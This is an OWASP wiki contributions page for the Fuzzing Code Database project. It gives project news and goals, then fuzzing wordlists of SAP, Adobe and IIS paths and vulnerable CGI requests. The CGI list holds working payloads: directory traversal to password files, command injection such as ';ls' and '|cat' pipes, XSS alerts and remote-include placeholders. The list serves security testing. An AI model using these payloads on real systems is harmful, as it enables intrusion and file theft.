https://wiki.owasp.org/api.php?action=feedcontributions&user=Foobar23&feedformat=atom
OWASP - User contributions [en]
2024-03-28T23:33:03Z
User contributions
MediaWiki 1.27.2
https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&diff=197793
Category:OWASP Fuzzing Code Database
2015-07-23T11:37:21Z
<p>Foobar23: Updated my contact information - I don't use Foobar@email.de anymore</p>
<hr />
<div>{|<br />
|-<br />
! width="700" align="center" | <br> <br />
! width="500" align="center" | <br><br />
|-<br />
| align="right" | [[Image:OWASP Inactive Banner.jpg|800px| link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Inactive_Projects]] <br />
| align="right" | <br />
<br />
|}<br />
This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. <br />
<br />
==== News ====<br />
<br />
'''10 November 2011'''<br />
<br />
*Update Category: SAP Common URL Web Interfaces (10 November 2011 - Total Statements: 155)<br />
<br />
'''08 November 2010'''<br />
<br />
*Created new Category: Adobe XML Files (08 November 2010 - Total Statements: 16)<br />
<br />
'''15 September 2010'''<br />
<br />
*Created new Category: SAP Common URL Web Interfaces (15 September 2010 - Total Statements: 6)<br />
<br />
'''17 March 2010'''<br />
<br />
*Created new Category: Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563)<br />
*Created new Category: Windows Directory Traversal (Update: 17 March 2010 - Total Statements: 16)<br />
*Created new Category: Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879)<br />
*Created new Category: Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)<br />
*Created new Category: File Upload Filter Bypass (Update: 17 March 2010 - Total Statements: 4)<br />
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)<br />
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)<br />
*Created new Category: Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)<br />
*Created new Category: Commonly Writable directories File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)<br />
<br />
'''16 March 2010'''<br />
<br />
*Created new Category: Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863)<br />
*Created new Category: Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284) <br />
*Created new Category: Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)<br />
*Created new Category: All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2010 - Total Statements: 31)<br />
<br />
<br />
'''02 February 2010'''<br />
<br />
*Created new Category Lotus/Notes Files<br />
<br />
'''11 August 2009''' <br />
<br />
*Created new Category: XML Attacks<br />
<br />
''Update Statements'' <br />
<br />
*15 new XML Statements <br />
*93 new SQL Injections Statements <br />
*67 new Traversal Directory Statements <br />
*Delete 33 XSS Statement Duplicate <br />
*30 New XSS Statements<br />
<br />
'''7 August 2009''' <br />
<br />
*Updated the objectives of the project.<br />
<br />
'''21 July 2009''' <br />
<br />
*Set the team responsible for the project.<br />
<br />
==== Goals ====<br />
<br />
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. <br />
<br />
In addition, the following functionalities will be included on this project: <br />
<br />
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases <br />
<br />
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: <br />
<br />
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. <br />
<br />
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. <br />
<br />
3 - Possibility to support users on the report of their own experiences with the statements. <br />
<br />
==== Statements ====<br />
<br />
=== Adobe XML Files (08 November 2010) ===<br />
<pre><br />
/flex2gateway/<br />
/flex2gateway/http<br />
/flex2gateway/httpsecure<br />
/flex2gateway/cfamfpoolling<br />
/flex2gateway/amf<br />
/flex2gateway/amfpolling<br />
/messagebroker/http<br />
/messagebroker/httpsecure<br />
/blazeds/messagebroker/http<br />
/blazeds/messagebroker/httpsecure<br />
/samples/messagebroker/http<br />
/samples/messagebroker/httpsecure<br />
/lcds/messagebroker/http<br />
/lcds/messagebroker/httpsecure<br />
/lcds-samples/messagebroker/http<br />
/lcds-samples/messagebroker/httpsecure<br />
</pre><br />
<br />
=== SAP Commom URL Web Interface (10 November 2011) ===<br />
<pre><br />
/rep/build_info.html<br />
/rep/build_info.jsp<br />
/run/build_info.html<br />
/run/build_info.jsp<br />
/rwb/version.html<br />
/sap/bc/bsp/esh_os_service/favicon.gif<br />
/sap/bc/bsp/sap<br />
/sap/bc/bsp/sap/alertinbox<br />
/sap/bc/bsp/sap/bsp_dlc_frcmp<br />
/sap/bc/bsp/sap/bsp_veri<br />
/sap/bc/bsp/sap/bsp_verificatio<br />
/sap/bc/bsp/sap/bsp_wd_base<br />
/sap/bc/bsp/sap/bspwd_basics<br />
/sap/bc/bsp/sap/certmap<br />
/sap/bc/bsp/sap/certreq<br />
/sap/bc/bsp/sap/crm_bsp_frame<br />
/sap/bc/bsp/sap/crmcmp_bpident/<br />
/sap/bc/bsp/sap/crmcmp_brfcase<br />
/sap/bc/bsp/sap/crmcmp_hdr<br />
/sap/bc/bsp/sap/crmcmp_hdr_std<br />
/sap/bc/bsp/sap/crmcmp_ic_frame<br />
/sap/bc/bsp/sap/crm_thtmlb_util<br />
/sap/bc/bsp/sap/crm_ui_frame<br />
/sap/bc/bsp/sap/crm_ui_start<br />
/sap/bc/bsp/sap/esh_sap_link<br />
/sap/bc/bsp/sap/esh_sapgui_exe<br />
/sap/bc/bsp/sap/graph_bsp_test<br />
/sap/bc/bsp/sap/graph_bsp_test/Mimes<br />
/sap/bc/bsp/sap/gsbirp<br />
/sap/bc/bsp/sap/htmlb_samples<br />
/sap/bc/bsp/sap/iccmp_bp_cnfirm<br />
/sap/bc/bsp/sap/iccmp_hdr_cntnr<br />
/sap/bc/bsp/sap/iccmp_hdr_cntnt<br />
/sap/bc/bsp/sap/iccmp_header<br />
/sap/bc/bsp/sap/iccmp_ssc_ll/<br />
/sap/bc/bsp/sap/ic_frw_notify<br />
/sap/bc/bsp/sap/it00<br />
/sap/bc/bsp/sap/public/bc<br />
/sap/bc/bsp/sap/public/graphics<br />
/sap/bc/bsp/sap/sam_demo<br />
/sap/bc/bsp/sap/sam_notifying<br />
/sap/bc/bsp/sap/sam_sess_queue<br />
/sap/bc/bsp/sap/sbspext_htmlb<br />
/sap/bc/bsp/sap/sbspext_xhtmlb<br />
/sap/bc/bsp/sap/spi_admin<br />
/sap/bc/bsp/sap/spi_monitor<br />
/sap/bc/bsp/sap/sxms_alertrules<br />
/sap/bc/bsp/sap/system<br />
/sap/bc/bsp/sap/thtmlb_scripts<br />
/sap/bc/bsp/sap/thtmlb_styles<br />
/sap/bc/bsp/sap/uicmp_ltx<br />
/sap/bc/bsp/sap/xmb_bsp_log<br />
/sap/bc/contentserver<br />
/sap/bc/echo<br />
/sap/bc/error<br />
/sap/bc/FormToRfc<br />
/sap/bc/graphics/net<br />
/sap/bc/gui/sap/its/CERTREQ<br />
/sap/bc/gui/sap/its/designs<br />
/sap/bc/gui/sap/its/webgui<br />
/sap/bc/IDoc_XML<br />
/sap/bc/ping<br />
/sap/bc/report<br />
/sap/bc/soap/ici<br />
/sap/bc/soap/rfc<br />
/sap/bc/srt/IDoc<br />
/sap/bc/wdvd<br />
/sap/bc/webdynpro/sap/apb_launchpad<br />
/sap/bc/webdynpro/sap/apb_launchpad_nwbc<br />
/sap/bc/webdynpro/sap/apb_lpd_light_start<br />
/sap/bc/webdynpro/sap/apb_lpd_start_url<br />
/sap/bc/webdynpro/sap/application_exit<br />
/sap/bc/webdynpro/sap/appl_log_trc_viewer<br />
/sap/bc/webdynpro/sap/appl_soap_management<br />
/sap/bc/webdynpro/sap/ccmsbi_wast_extr_testenv<br />
/sap/bc/webdynpro/sap/cnp_light_test<br />
/sap/bc/webdynpro/sap/configure_application<br />
/sap/bc/webdynpro/sap/configure_component<br />
/sap/bc/webdynpro/sap/esh_search_results.ui<br />
/sap/bc/webdynpro/sap/esh_adm_smoketest_ui<br />
/sap/bc/webdynpro/sap/sh_adm_smoketest_files<br />
/sap/bc/webdynpro/sap/esh_eng_modelling<br />
/sap/bc/webdynpro/sap/esh_admin_ui_component<br />
/sap/bc/webdynpro/sap/wdhc_application<br />
/sap/bc/webdynpro/sap/wd_analyze_config_appl<br />
/sap/bc/webdynpro/sap/wd_analyze_config_comp<br />
/sap/bc/webdynpro/sap/wd_analyze_config_user<br />
/sap/bc/webdynpro/sap/WDR_TEST_ADOBE<br />
/sap/bc/webdynpro/sap/WDR_TEST_EVENTS<br />
/sap/bc/webdynpro/sap/wdr_test_popups_rt<br />
/sap/bc/webdynpro/sap/WDR_TEST_TABLE<br />
/sap/bc/webdynpro/sap/wdr_test_ui_elements<br />
/sap/bc/webdynpro/sap/WDR_TEST_WINDOW_ERROR<br />
/sap/bc/webrfc<br />
/sap/bc/xrfc<br />
/sap/bc/xrfc_test<br />
/sap/es/cockpit<br />
/sap/es/getdocument<br />
/sap/es/opensearch<br />
/sap/es/opensearch/description<br />
/sap/es/opensearch/list<br />
/sap/es/opensearch/search<br />
/sap/es/saplink<br />
/sap/es/search<br />
/sap/es/redirect<br />
/sap/crm<br />
/sap/public/bc<br />
/sap/public/bc/icons<br />
/sap/public/bc/icons_rtl<br />
/sap/public/bc/its/mimes<br />
/sap/public/bc/its/mimes/system/SL/page/hourglass.html<br />
/sap/public/bc/its/mobile/itsmobile00<br />
/sap/public/bc/its/mobile/itsmobile01<br />
/sap/public/bc/its/mobile/rfid<br />
/sap/public/bc/its/mobile/start<br />
/sap/public/bc/its/mobile/test<br />
/sap/public/bc/NWDEMO_MODEL<br />
/sap/public/bc/NW_ESH_TST_AUTO<br />
/sap/public/bc/pictograms<br />
/sap/public/bc/sicf_login_run<br />
/sap/public/bc/trex<br />
/sap/public/bc/ur<br />
/sap/public/bc/wdtracetool<br />
/sap/public/bc/webdynpro/adobechallenge<br />
/sap/public/bc/webdynpro/mimes<br />
/sap/public/bc/webdynpro/ssr<br />
/sap/public/bc/webdynpro/viewdesigner<br />
/sap/public/bc/webicons<br />
/sap/public/bc/workflow<br />
/sap/public/bc/workflow/shortcut<br />
/sap/public/bsp/sap<br />
/sap/public/bsp/sap/htmlb<br />
/sap/public/bsp/sap/public<br />
/sap/public/bsp/sap/public/bc<br />
/sap/public/bsp/sap/public/faa<br />
/sap/public/bsp/sap/public/graphics<br />
/sap/public/bsp/sap/public/graphics/jnet_handler<br />
/sap/public/bsp/sap/public/graphics/mimes<br />
/sap/public/bsp/sap/system<br />
/sap/public/bsp/sap/system_public<br />
/sap/public/icf_check<br />
/sap/public/icf_info<br />
/sap/public/icf_info/icr_groups<br />
/sap/public/icf_info/icr_urlprefix<br />
/sap/public/icf_info/logon_groups<br />
/sap/public/icf_info/urlprefix<br />
/sap/public/icman<br />
/sap/public/info<br />
/sap/public/myssocntl<br />
/sap/public/ping<br />
/sap/webcuif<br />
/sap/public/icman/ping<br />
/sap/admin<br />
/sap/wdisp/admin<br />
/scripts/wgate<br />
</pre><br />
<br />
=== Microsoft URLs (8 April 2010) ===<br />
<pre># Interesting IIS Files & Directories (8 April 2010)<br />
# adam.muntner@quietmove.com<br />
# creative commons<br />
# Look at the result codes in the headers - 403 likely mean the dir exists, 404 means not. It takes an ISAPI filter for IIS to return 404's for 403s. <br />
# Altetrnatively, slight differences in the number of bytes returned will help differentiate.<br />
<br />
/.printer<br />
/%NETHOOD%/<br />
/<script>alert('XSS')</script>.aspx<br />
/AccessPlatform/<br />
/AccessPlatform/auth/<br />
/AccessPlatform/auth/clientscripts/cookies.js <br />
/AccessPlatform/auth/clientscripts/login.js <br />
/Exadmin/<br />
/ExchWeb/<br />
/Exchange/<br />
/Microsoft-Server-ActiveSync/<br />
/OMA/<br />
/OWA/<br />
/Public/<br />
/_layouts/alllibs.htm<br />
/_layouts/settings.htm<br />
/_layouts/userinfo.htm<br />
/_vti_bin/<br />
/_vti_bin/_vti_aut/fp30reg.dll<br />
/_vti_pvt/<br />
/_WEB_INF/<br />
/a%5c.aspx<br />
/adovbs.inc<br />
/aspnet_files/<br />
/certcontrol/<br />
/certenroll/<br />
/certsrv/<br />
/citrix/<br />
/citrix/AccessPlatform/auth/<br />
/citrix/AccessPlatform/auth/clientscripts/<br />
/AccessPlatform/auth/clientscripts/<br />
/Citrix//AccessPlatform/auth/clientscripts/cookies.js <br />
/Citrix/AccessPlatform/auth/clientscripts/login.js <br />
/Citrix/PNAgent/config.xml<br />
/exchange/root.asp<br />
/forum.asp<br />
/forum_arc.asp<br />
/forum_professionnel.asp<br />
/iisadmin/<br />
/iisadmpwd/achg.htr<br />
/iisadmpwd/aexp.htr<br />
/iisadmpwd/aexp2.htr<br />
/iisadmpwd/aexp2b.htr<br />
/iisadmpwd/aexp3.htr<br />
/iisadmpwd/aexp4.htr<br />
/iisadmpwd/aexp4b.htr<br />
/iisadmpwd/anot.htr<br />
/iisadmpwd/anot3.htr<br />
/iiasdmpwd/<br />
/iishelp/<br />
/iishelp/iis/misc/default.asp<br />
/iissamples/<br />
/imprimer.asp<br />
/includes/adovbs.inc<br />
/msadc/<br />
/null.htw<br />
/pbserver/pbserver.dll<br />
/postinfo.html<br />
/rubrique.asp<br />
/scripts/<br />
/scripts/fpcount.exe<br />
/scripts/cgimail.exe<br />
/scripts/tools/newdsn.exe<br />
/scripts/tools/getdrvs.exe<br />
/scripts/convert.bas<br />
/cgi-bin/htmlscript<br />
/scripts/counter.exe<br />
/scripts/no-such-file.pl<br />
/share/<br />
/tsweb/<br />
/~/<script>alert('XSS')</script>.asp<br />
/~/<script>alert('XSS')</script>.aspx<br />
/index.shtml<br />
/x.htw<br />
/x.ida<br />
/x.idq<br />
/cgi<br />
/scripts/iisadmin/ism.dll?http/dir<br />
/scripts/samples/search/webhits.exe<br />
</pre><br />
<br />
=== Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563) ===<br />
<pre># Vulnerable Cross-Platform CGI (17 March 2010) <br />
# fuzz inside cgi directories<br />
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi<br />
# adam.muntner@quietmove.com<br />
<br />
%2e%2e/abyss.conf<br />
.access<br />
.cobalt<br />
.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('XSS')><br />
.cobalt/alert/service.cgi?service=<script>alert('XSS')</script><br />
.fhp<br />
.htaccess<br />
.htaccess.old<br />
.htaccess.save<br />
.htaccess~<br />
.htpasswd<br />
.nsconfig<br />
.passwd<br />
.www_acl<br />
.wwwacl<br />
/_vti_pvt/doctodep.btr<br />
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}<br />
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}<br />
AT-admin.cgi<br />
AT-generate.cgi<br />
Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0<br />
AnyBoard.cgi<br />
AnyForm<br />
AnyForm2<br />
Backup/add-passwd.cgi<br />
C<br />
Count.cgi<br />
DC<br />
DCFORM<br />
File<br />
FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com<br />
FormMail.cgi?<script>alert(\<br />
FormMail.pl<br />
ImageFolio/admin/admin.cgi<br />
LWGate<br />
LWGate.cgi<br />
Upload.pl<br />
Vs<br />
W<br />
YaBB.pl?board=news&action=display&num=../../../../../../../../../..{KNOWNFILE}%00<br />
YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('XSS')</script><br />
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}<br />
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}<br />
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}<br />
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}<br />
add_ftp.cgi<br />
addbanner.cgi<br />
adduser.cgi<br />
admin.cgi<br />
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}<br />
admin.php<br />
admin.php3<br />
admin.pl<br />
adminhot.cgi<br />
adminwww.cgi<br />
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd<br />
aglimpse<br />
aglimpse.cgi<br />
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,<br />
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd<br />
amadmin.pl<br />
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}<br />
ans.pl?p=../../../../../usr/bin/id|&blah<br />
ans/ans.pl?p=../../../../../usr/bin/id|&blah<br />
anyboard.cgi<br />
archie<br />
architext_query.cgi<br />
architext_query.pl<br />
ash<br />
astrocam.cgi<br />
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL<br />
auction/auction.cgi?action=<br />
auctiondeluxe/auction.pl<br />
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}<br />
auth_data/auth_user_file.txt<br />
awl/auctionweaver.pl<br />
awstats.pl<br />
awstats/awstats.pl<br />
ax-admin.cgi<br />
ax.cgi<br />
axs.cgi<br />
badmin.cgi<br />
banner.cgi<br />
bannereditor.cgi<br />
bash<br />
bb-hist?HI<br />
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK<br />
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK<br />
bbs_forum.cgi<br />
betsie/parserl.pl/<script>alert('XSS')</script>;<br />
bigconf.cgi?command=view_textfile&file={KNOWNFILE}&filters=<br />
bizdb1-search.cgi<br />
blog/<br />
blog/mt-check.cgi<br />
blog/mt-load.cgi<br />
blog/mt.cfg<br />
bnbform<br />
bnbform.cgi<br />
book.cgi?action=default&current=|cat%20{KNOWNFILE}|&form_tid=996604045&prev=main.html&list_message_index=10<br />
boozt/admin/index.cgi?section=5&input=1<br />
bsguest.cgi?email=x;ls<br />
bslist.cgi?email=x;ls<br />
build.cgi<br />
bulk/bulk.cgi<br />
c_download.cgi<br />
cached_feed.cgi<br />
cachemgr.cgi<br />
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00<br />
calendar<br />
calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22<br />
calendar.pl<br />
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|<br />
calendar/index.cgi<br />
calendar_admin.pl?config=|cat%20{KNOWNFILE}|<br />
calender_admin.pl<br />
campas?%0acat%0a{KNOWNFILE}%0a<br />
cart.pl<br />
cart.pl?db='<br />
cartmanager.cgi<br />
cbmc/forums.cgi<br />
ccbill-local.cgi?cmd=MENU<br />
ccbill-local.pl?cmd=MENU<br />
cgforum.cgi<br />
cgi-lib.pl<br />
cgicso?query=<script>alert('XSS')</script><br />
cgicso?query=AAA<br />
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00<br />
cgiwrap<br />
cgiwrap/%3Cfont%20color=red%3E<br />
cgiwrap/~@U<br />
cgiwrap/~JUNK(5)<br />
cgiwrap/~root<br />
change-your-password.pl<br />
classified.cgi<br />
classifieds<br />
classifieds.cgi<br />
classifieds/classifieds.cgi<br />
classifieds/index.cgi<br />
clickcount.pl?view=test<br />
clickresponder.pl<br />
code.php<br />
code.php3<br />
com5..........................................................................................................................................................................................................................box<br />
com5.java<br />
com5.pl<br />
commandit.cgi<br />
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html<br />
common.php?f=0&ForumLang=../../../../../../../../../..{KNOWNFILE}<br />
common/listrec.pl<br />
common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|<br />
compatible.cgi<br />
count.cgi<br />
counter-ord<br />
counterbanner<br />
counterbanner-ord<br />
counterfiglet-ord<br />
counterfiglet/nc/<br />
cs<br />
csChatRBox.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}')<br />
csGuestBook.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}')<br />
csLive<br />
csNews.cgi<br />
csNewsPro.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}')<br />
csPassword.cgi<br />
csPassword/csPassword.cgi<br />
csh<br />
cstat.pl<br />
cutecast/members/<br />
cvsblame.cgi?file=<script>alert('XSS')</script><br />
cvslog.cgi?file=*&rev=&root=<script>alert('XSS')</script><br />
cvslog.cgi?file=<script>alert('XSS')</script><br />
cvsquery.cgi?branch=<script>alert('XSS')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script><br />
cvsquery.cgi?module=<script>alert('XSS')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week<br />
cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('XSS')</script>&branch=HEAD<br />
dansguardian.pl?DENIEDURL=</a><script>alert('XSS');</script><br />
dasp/fm_shell.asp<br />
data/fetch.php?page=<br />
date<br />
day5datacopier.cgi<br />
day5datanotifier.cgi<br />
db2www/library/document.d2w/show<br />
db4web_c/dbdirname/{KNOWNFILE}<br />
db_manager.cgi<br />
dbman/db.cgi?db=no-db<br />
dcforum.cgi?az=list&forum=../../../../../../../../../..{KNOWNFILE}%00<br />
dcshop/auth_data/auth_user_file.txt<br />
dcshop/orders/orders.txt<br />
dfire.cgi<br />
diagnose.cgi<br />
dig.cgi<br />
directorypro.cgi?want=showcat&show=../../../../../../../../../..{KNOWNFILE}%00<br />
displayTC.pl<br />
dnewsweb<br />
donothing<br />
dose.pl?daily&somefile.txt&|ls|<br />
download.cgi<br />
dumpenv.pl<br />
edit.pl<br />
empower?DB=whateverwhatever<br />
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
enter.cgi<br />
environ.cgi<br />
environ.pl<br />
environ.pl?param1=<script>alert(document.cookie)</script><br />
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E<br />
eshop.pl/seite=;cat%20eshop.pl|<br />
ex-logger.pl<br />
excite<br />
excite;IF<br />
ezadmin.cgi<br />
ezboard.cgi<br />
ezman.cgi<br />
ezshopper/loadpage.cgi?user_id=1&file=|cat%20{KNOWNFILE}|<br />
ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../..{KNOWNFILE}&distinct=1<br />
ezshopper2/loadpage.cgi<br />
ezshopper3/loadpage.cgi<br />
faqmanager.cgi?toc={KNOWNFILE}%00<br />
faxsurvey?cat%20{KNOWNFILE}<br />
filemail<br />
filemail.pl<br />
finger<br />
finger.pl<br />
flexform<br />
flexform.cgi<br />
fom.cgi?file=<script>alert('XSS')</script><br />
fom/fom.cgi?cmd=<script>alert('XSS')</script>&file=1&keywords=vulnerable<br />
formmail<br />
formmail.cgi<br />
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test<br />
formmail.pl<br />
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test<br />
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test<br />
fortune<br />
ftp.pl<br />
ftpsh<br />
gH.cgi<br />
gbadmin.cgi?action=change_adminpass<br />
gbadmin.cgi?action=change_automail<br />
gbadmin.cgi?action=colors<br />
gbadmin.cgi?action=setup<br />
gbook/gbook.cgi?_MAILTO=xx;ls<br />
gbpass.pl<br />
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1<br />
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1<br />
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1<br />
getdoc.cgi<br />
gettransbitmap<br />
glimpse<br />
gm-authors.cgi<br />
gm-cplog.cgi<br />
gm.cgi<br />
guestbook.cgi<br />
guestbook.cgi?user=cpanel&template=|/bin/cat%20{KNOWNFILE}|<br />
guestbook.pl<br />
guestbook/passwd<br />
handler.cgi<br />
hitview.cgi<br />
horde/test.php<br />
horde/test.php?mode=phpinfo<br />
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00<br />
htgrep?file=index.html&hdr={KNOWNFILE}<br />
html2chtml.cgi<br />
html2wml.cgi<br />
htmlscript?../../../../../../../../../..{KNOWNFILE}<br />
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E<br />
htsearch?-c/nonexistant<br />
htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=<br />
htsearch?exclude=%60{KNOWNFILE}%60<br />
ibill.pm<br />
icat<br />
if/admin/nph-build.cgi<br />
ikonboard/help.cgi?<br />
imageFolio.cgi<br />
imagefolio/admin/admin.cgi<br />
imagemap<br />
include/new-visitor.inc.php<br />
index.js0x70<br />
index.pl<br />
info2www<br />
info2www '(../../../../../../../bin/mail root <{KNOWNFILE}><br />
infosrch.cgi<br />
ion-p?page=../../../../..{KNOWNFILE}<br />
jailshell<br />
jj<br />
journal.cgi?folder=journal.cgi%00<br />
ksh<br />
lastlines.cgi?process<br />
listrec.pl<br />
loadpage.cgi?user_id=1&file=../../../../../../../../../..{KNOWNFILE}<br />
loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini<br />
log-reader.cgi<br />
log/<br />
log/nether-log.pl?checkit<br />
login.cgi<br />
login.pl<br />
login.pl?course_id=\<br />
logit.cgi<br />
logs.pl<br />
logs/<br />
logs/access_log<br />
logs/error_log<br />
lookwho.cgi<br />
ls<br />
lwgate<br />
lwgate.cgi<br />
magiccard.cgi?pa=3Dpreview&amp;next=3Dcustom&amp;page=3D../../../../../../../../../..{KNOWNFILE}<br />
mail<br />
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../..{KNOWNFILE}%00<br />
mailit.pl<br />
maillist.cgi<br />
maillist.pl<br />
mailnews.cgi<br />
main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../..{KNOWNFILE}<br />
majordomo.pl<br />
man2html<br />
mastergate/search.cgi?search=0&search_on=all<br />
meta.pl<br />
mgrqcgi<br />
mini_logger.cgi<br />
mmstdod.cgi<br />
moin.cgi?test<br />
mojo/mojo.cgi<br />
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}<br />
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}<br />
mrtg.cgi?cfg=blah<br />
ms_proxy_auth_query/<br />
mt-static/<br />
mt-static/mt-check.cgi<br />
mt-static/mt-load.cgi<br />
mt-static/mt.cfg<br />
mt/<br />
mt/mt-check.cgi<br />
mt/mt-load.cgi<br />
mt/mt.cfg<br />
multihtml.pl?multi={KNOWNFILE}%00html<br />
musicqueue.cgi<br />
myguestbook.cgi?action=view<br />
namazu.cgi<br />
nbmember.cgi?cmd=list_all_users<br />
netauth.cgi?cmd=show&page=../../../../../../../../../..{KNOWNFILE}<br />
netpad.cgi<br />
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}<br />
nimages.php<br />
nlog-smb.cgi<br />
nlog-smb.pl<br />
non-existent.pl<br />
noshell<br />
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
nph-error.pl<br />
nph-exploitscanget.cgi<br />
nph-maillist.pl<br />
nph-publish<br />
nph-publish.cgi<br />
nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0<br />
nph-test-cgi<br />
ntitar.pl<br />
opendir.php?{KNOWNFILE}<br />
orders/orders.txt<br />
pagelog.cgi<br />
pals-cgi?palsAction=restart&documentName={KNOWNFILE}<br />
parse-file<br />
pass<br />
passwd<br />
passwd.txt<br />
password<br />
pbcgi.cgi?name=Joe%Camel&email=%3C<br />
perl<br />
perl?-v<br />
perlshop.cgi<br />
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'<br />
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}<br />
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'<br />
phf<br />
phf.cgi?QALIA<br />
phf?Qname=root%0Acat%20{KNOWNFILE}%20<br />
photo/<br />
photo/manage.cgi<br />
photo/protected/manage.cgi<br />
php-cgi<br />
php.cgi?{KNOWNFILE}<br />
plusmail<br />
pollit/Poll_It_<br />
pollssi.cgi<br />
post-query<br />
post_query<br />
postcards.cgi<br />
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}<br />
printenv<br />
printenv.tmp<br />
